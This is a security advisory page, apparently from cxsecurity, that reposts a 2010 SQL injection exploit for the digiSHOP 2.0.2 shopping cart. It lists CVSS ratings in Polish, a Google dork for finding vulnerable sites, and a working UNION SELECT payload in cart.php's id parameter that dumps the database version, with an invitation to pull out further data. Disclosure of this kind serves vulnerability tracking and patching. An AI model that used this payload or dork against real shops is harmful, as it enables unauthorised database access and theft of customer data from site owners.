digiSHOP 2.0.2 remote SQL injection vulnerability

2010.11.04
Credit: Silic0n
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

----------------------------------- TM | ___ ___ _______ | | Y | ______ | | | |. 1 ||______||.| | | | |. _ | `-|. |-' | |: | | |: | | |::.|:. | |::.| | `--- ---' `---' | Private Place Of 0days | ----------------------------------- ^Exploit Title : ^Date : 23/7/2010 ^Vendor Site : http://digishop.digisoft77.com/ ^MOD Version : digiSHOP 2.0.2 ^Author : Silic0n (science_media017[At]yahoo.com) ^Team Site : www.hacking-truths.net ^Dork : inurl:cart.php?m=features&id= ------------------------------------------------------------------------------ Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o, Belma(sweety) ,Danzel, messsy , ,abronsius ,Nova ,ConsoleFx , Exi , Beenu , R4cal , jaya ,@ry@n,[]0iZy5 & All my friends . My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) ----------------------------------->Exploit<---------------------------------- 0x1: Goto http://{localhost}/{Shop path}/cart.php?m=features&id=-15+Union+Select+1,2,@@version,4,5,6,7 MySql Version : 4.1.22-log Now Use Brain.Exe (7) To extract the Other information this exploit is only education Purpose only ,author or team member is not responsible for any harm ------------------------------------------------------------------------------

Referencje:

http://xforce.iss.net/xforce/xfdb/62964
http://www.securityfocus.com/bid/44614
http://www.exploit-db.com/exploits/15405
http://packetstormsecurity.org/1011-exploits/digishop-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top